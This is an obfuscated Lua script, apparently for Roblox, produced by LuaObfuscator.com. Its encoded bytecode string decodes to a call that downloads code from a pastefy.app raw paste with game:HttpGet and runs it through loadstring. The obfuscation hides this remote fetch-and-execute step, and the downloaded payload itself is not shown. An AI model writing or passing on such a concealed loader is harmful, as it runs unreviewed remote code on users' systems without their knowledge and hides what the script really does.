--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v111=v5(v87,v19);v19=nil;return v111;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=0 -0 ;local v89;while true do if (v88==(0 -0)) then v89=(v31/((5 -3)^(v32-(1 -(1065 -(68 + 997))))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v89-(v89%(569 -(367 + 201))) ;end end else local v90=927 -((1484 -(226 + 1044)) + 713) ;local v91;while true do if (v90==((0 -0) + 0)) then v91=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v91 + v91))>=v91) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37=0 + 0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(892 + 65))) then return (v41 * (40022563 -23245347)) + (v40 * (160901 -95365)) + (v39 * (472 -216)) + v38 ;end if ((0 -0)==v37) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;v37=1;end end end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if ((1 + 0)==v42) then v45=1 + 0 ;v46=(v20(v44,1,79 -(825 -(745 + 21)) ) * (2^((4658 -3674) -(802 + 150)))) + v43 ;v42=5 -3 ;end if (v42==(3 -1)) then v47=v20(v44,16 + 5 ,803 -(201 + 571) );v48=((v20(v44,(354 + 675) -(361 + 554 + 82) )==(2 -1)) and  -(1 + 0)) or (3 -(5 -3)) ;v42=3 -0 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1188 -(1069 + (462 -344)) ;end if (v42==(6 -3)) then if (v47==((0 + 0) -(0 -0))) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0;end elseif (v47==(724 + 1323)) then return ((v46==(791 -(368 + (2170 -(760 + 987))))) and (v48 * ((3 -2)/(18 -(10 + 8))))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -(4824 -(1789 + 124))) ) * (v45 + (v46/((444 -(416 + 26))^52))) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1055 -(87 + 968))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92~= #",") then else if (v93== #":") then v94=(function() return v95()~=(1941 -(550 + 1391)) ;end)();elseif (v93==(3 -1)) then v94=(function() return v96();end)();elseif (v93== #"-19") then v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (v92~=0) then else local v117=(function() return 0 -0 ;end)();local v118=(function() return;end)();while true do if (v117==(1784 -(599 + 1185))) then v118=(function() return 0;end)();while true do if (v118==0) then v93=(function() return v95();end)();v94=(function() return nil;end)();v118=(function() return 1 + 0 ;end)();end if (v118~=1) then else v92=(function() return  #">";end)();break;end end break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v53=(function() return function(v100,v101,v102) local v103=(function() return 0;end)();local v104=(function() return;end)();while true do if ((0 + 0)~=v103) then else v104=(function() return 574 -(507 + 67) ;end)();while true do if (v104~=(1749 -(1013 + 736))) then else v100[v101-#"~" ]=(function() return v102();end)();return v100,v101,v102;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"~",v58 do FlatIdent_6D4CB,Type,Cons,v21,v24,v25,v59,v69=(function() return v52(FlatIdent_6D4CB,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"19("]=(function() return v21();end)();for v70= #"~",v23() do local v71=(function() return v21();end)();if (v20(v71, #"~", #"{")==0) then local v107=(function() return 0 + 0 ;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (1==v107) then local v121=(function() return 0 -0 ;end)();while true do if (v121==(0 -0)) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v128=(function() return 867 -(550 + 317) ;end)();local v129=(function() return;end)();while true do if (v128==0) then v129=(function() return 0 -0 ;end)();while true do if (v129==0) then v110[ #"xnx"]=(function() return v22();end)();v110[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"[") then v110[ #"19("]=(function() return v23();end)();elseif (v108==(2 -0)) then v110[ #"nil"]=(function() return v23() -((5 -3)^16) ;end)();elseif (v108== #"-19") then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (v181==(285 -(134 + 151))) then v182=(function() return 0;end)();while true do if (v182==0) then v110[ #"xnx"]=(function() return v23() -((1667 -(970 + 695))^(30 -14)) ;end)();v110[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v121=(function() return 1;end)();end if (v121==(1991 -(582 + 1408))) then v107=(function() return 6 -4 ;end)();break;end end end if ((3 -0)~=v107) then else if (v20(v109, #"xnx", #"gha")== #"/") then v110[ #"xnxx"]=(function() return v59[v110[ #"http"]];end)();end v54[v70]=(function() return v110;end)();break;end if ((0 -0)~=v107) then else local v123=(function() return 1824 -(1195 + 629) ;end)();while true do if (v123~=0) then else v108=(function() return v20(v71,2, #"nil");end)();v109=(function() return v20(v71, #"0313",7 -1 );end)();v123=(function() return 1;end)();end if (v123==(242 -(187 + 54))) then v107=(function() return 781 -(162 + 618) ;end)();break;end end end if (v107==(2 + 0)) then if (v20(v109, #"\\", #" ")~= #"[") then else v110[2 + 0 ]=(function() return v59[v110[3 -1 ]];end)();end if (v20(v109,2 -0 ,1 + 1 )== #"}") then v110[ #"gha"]=(function() return v59[v110[ #"xxx"]];end)();end v107=(function() return 3;end)();end end end end for v72= #".",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[(1230 + 407) -(1373 + 263) ];local v65=v61[168 -(122 + 44) ];local v66=v61[5 -2 ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=3 -2 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v105=0 -(0 + 0) ,v81 do if ((4853>=2982) and (v105>=v75)) then v79[v105-v75 ]=v80[v105 + (1 -0) ];else v83[v105]=v80[v105 + (1258 -(1043 + 214)) ];end end local v84=(v81-v75) + ((1507 -(363 + 1141)) -2) ;local v85;local v86;while true do local v106=1384 -(746 + (2218 -(1183 + 397))) ;while true do if (v106==(1 + 0)) then if (v86<=(4 -1)) then if (v86<=((1041 -699) -(218 + 123))) then if ((4134>3357) and (v86>(1581 -(1535 + 46)))) then local v130=0 + 0 ;local v131;local v132;local v133;local v134;while true do if ((v130==2) or (3417<2534)) then for v175=v131,v78 do local v176=0;while true do if (v176==(413 -(15 + 398))) then v134=v134 + 1 + 0 ;v83[v175]=v132[v134];break;end end end break;end if (v130==(0 + 0)) then v131=v85[562 -(306 + 254) ];v132,v133=v76(v83[v131](v13(v83,v131 + 1 + 0 ,v85[2 + 1 ])));v130=(1 + 0) -(0 + 0) ;end if ((v130==(1468 -(899 + 568))) or (2722<=164)) then v78=(v133 + v131) -(1 + 0) ;v134=0 -0 ;v130=605 -((2243 -(1913 + 62)) + 335) ;end end else local v135;local v136,v137;local v138;local v139;v83[v85[292 -(60 + 230) ]]={};v77=v77 + (573 -(426 + 146)) ;v85=v73[v77];v83[v85[1 + 1 ]]=v63[v85[1459 -(178 + 104 + 1174) ]];v77=v77 + ((2149 -1337) -(569 + 242)) ;v85=v73[v77];v83[v85[(1938 -(565 + 1368)) -3 ]]=v63[v85[1 + (7 -5) ]];v77=v77 + ((2686 -(1477 + 184)) -(706 + 318)) ;v85=v73[v77];v139=v85[(1706 -453) -(721 + 530) ];v138=v83[v85[11 -8 ]];v83[v139 + (1272 -(945 + 304 + 22)) ]=v138;v83[v139]=v138[v85[11 -7 ]];v77=v77 + (2 -1) ;v85=v73[v77];v83[v85[9 -7 ]]=v85[3 + 0 ];v77=v77 + (701 -(271 + (1285 -(564 + 292)))) ;v85=v73[v77];v139=v85[2 + 0 ];v136,v137=v76(v83[v139](v13(v83,v139 + (1501 -(1408 + 92)) ,v85[1089 -(461 + 625) ])));v78=(v137 + v139) -(1 + (0 -0)) ;v135=1288 -((2992 -1999) + 295) ;for v161=v139,v78 do local v162=0 + 0 ;while true do if ((((304 -(244 + 60)) -0)==v162) or (2408<2109)) then v135=v135 + (1172 -(418 + 753)) ;v83[v161]=v136[v135];break;end end end v77=v77 + 1 + 0 ;v85=v73[v77];v139=v85[1 + 1 ];v83[v139]=v83[v139](v13(v83,v139 + 1 + 0 ,v78));v77=v77 + 1 + 0 ;v85=v73[v77];v83[v85[755 -(239 + 396 + 118) ]]();v77=v77 + (530 -(406 + 123)) ;v85=v73[v77];do return;end end elseif ((v86>(1331 -(797 + 532))) or (33==1455)) then v83[v85[(478 -(41 + 435)) + 0 ]]=v85[1772 -(1749 + 20) ];else local v157=0 + 0 ;local v158;local v159;while true do if ((1322 -((2250 -(938 + 63)) + 57 + 16))==v157) then v158=v85[1 + 1 ];v159=v83[v85[734 -(476 + 255) ]];v157=1146 -(466 + 679) ;end if (v157==1) then v83[v158 + (2 -1) ]=v159;v83[v158]=v159[v85[11 -7 ]];break;end end end elseif (v86<=(1905 -(106 + 1794))) then if (v86==(3 + 1)) then v83[v85[1 + 1 ]]={};else v83[v85[1 + 1 ]]();end elseif (v86<=(17 -11)) then do return;end elseif ((v86==7) or (443>=4015)) then local v164=v85[5 -3 ];v83[v164]=v83[v164](v13(v83,v164 + (115 -(4 + 110)) ,v78));else v83[v85[586 -(57 + 527) ]]=v63[v85[3]];end v77=v77 + (1428 -(41 + 1386)) ;break;end if ((3382>166) and (v106==(103 -(17 + 86)))) then v85=v73[v77];v86=v85[1 + 0 ];v106=(1126 -(936 + 189)) -0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F4C3237734B78614F2F72617700099Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
